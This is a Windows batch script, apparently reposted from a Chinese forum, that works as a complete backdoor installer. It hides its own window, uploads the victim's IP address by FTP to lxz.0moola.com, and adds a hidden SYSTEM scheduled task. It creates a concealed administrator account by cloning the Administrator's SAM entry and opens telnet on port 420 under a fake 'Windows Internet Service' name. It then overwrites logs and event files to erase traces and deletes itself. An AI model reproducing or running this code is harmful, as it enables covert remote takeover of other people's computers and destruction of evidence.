@echo off
cls
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
time /t>>time.txt
for /f "tokens=2 delims=:" %%a in (time.txt) do set ip=%%a
del time.txt /q
ipconfig>>ipconfig.txt
for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do echo %%i>>ip.txt
echo open lxz.0moola.com 21>a
echo lxz.0moola.com>>a
echo 1052104151>>a
echo bin>>a
echo put ip.txt /IP/%ip%.txt>>a
echo by>>a
ftp.exe -s:a
del ipconfig.txt /q
del ip.txt /q
del a /q
sc config Schedule start= auto
net start schedule
schtasks /create /tn Monitor /tr %SystemRoot%\system32\inetser.bat /sc onlogon /ru system
echo inetscr.exe -s:%SystemRoot%\system32\a >>%SystemRoot%\system32\inetser.bat
echo open 本机IP 端口>%SystemRoot%\system32\a
copy %SystemRoot%\system32\ftp.exe %SystemRoot%\system32\inetscr.exe
attrib +s +h %SystemRoot%\system32\a
attrib +s +h %SystemRoot%\system32\inetscr.exe
attrib +s +h %SystemRoot%\tasks\Monitor.job
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /f /t REG_DWORD /d 00000000
echo Windows Registry Editor Version 5.00 >>c:\h.reg
echo. >>c:\h.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\lxz$] >>c:\h.reg
echo @=hex(1f7): >>c:\h.reg
echo regedit /s c:\h.reg >>c:\h.bat
echo del c:\h.reg /q >>c:\h.bat
echo REG add HKLM\SAM\SAM\Domains\Account\Users\000001F7 >>c:\h.bat
echo REG COPY HKLM\SAM\SAM\Domains\Account\Users\000001F4 HKLM\SAM\SAM\Domains\Account\Users\000001F7 /s /f >>c:\h.bat
echo net user lxz$ lxz>>c:\h.bat
echo del c:\h.bat /q >>c:\h.bat
at 10:00 c:\h.bat
schtasks /run /tn at1
schtasks /run /tn Monitor
tlntadmn config sec = -ntlm
tlntadmn config port = 420
copy %SystemRoot%\system32\tlntsvr.exe %SystemRoot%\system32\inetsvr.exe
attrib +s +h %SystemRoot%\system32\inetsvr.exe
echo [Version] >>c:\inetsvr.inf
echo Signature="$WINDOWS NT$" >>c:\inetsvr.inf
echo [DefaultInstall.Services] >>c:\inetsvr.inf
echo AddService=inetsvr,,My_AddService_Name >>c:\inetsvr.inf
echo [My_AddService_Name] >>c:\inetsvr.inf
echo DisplayName=Windows Internet Service >>c:\inetsvr.inf
echo Description=提供对 Internet 信息服务管理的支持。>>c:\inetsvr.inf
echo ServiceType=0x10 >>c:\inetsvr.inf
echo StartType=2 >>c:\inetsvr.inf
echo ErrorControl=0 >>c:\inetsvr.inf
echo ServiceBinary=%SystemRoot%\system32\inetsvr.exe >>c:\inetsvr.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf 
del c:\inetsvr.inf /q
net start inetsvr
net stop schedule
for /r %%a in (*.txt) do find "本机IP" >nul %%a && echo 1980>%%a
for /r %%b in (*.log) do find "本机IP" >nul %%b && echo 1980>%%b
for /r %%c in (*.evt) do find "本机IP" >nul %%c && echo 1980>%%c
for /r %%d in (*.event) do find "本机IP" >nul %%d && echo 1980>%%d
net start schedule
schtasks /delete /tn at1 /f
del %0 /q
del lxz.bat /q
复制代码

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf 
复制代码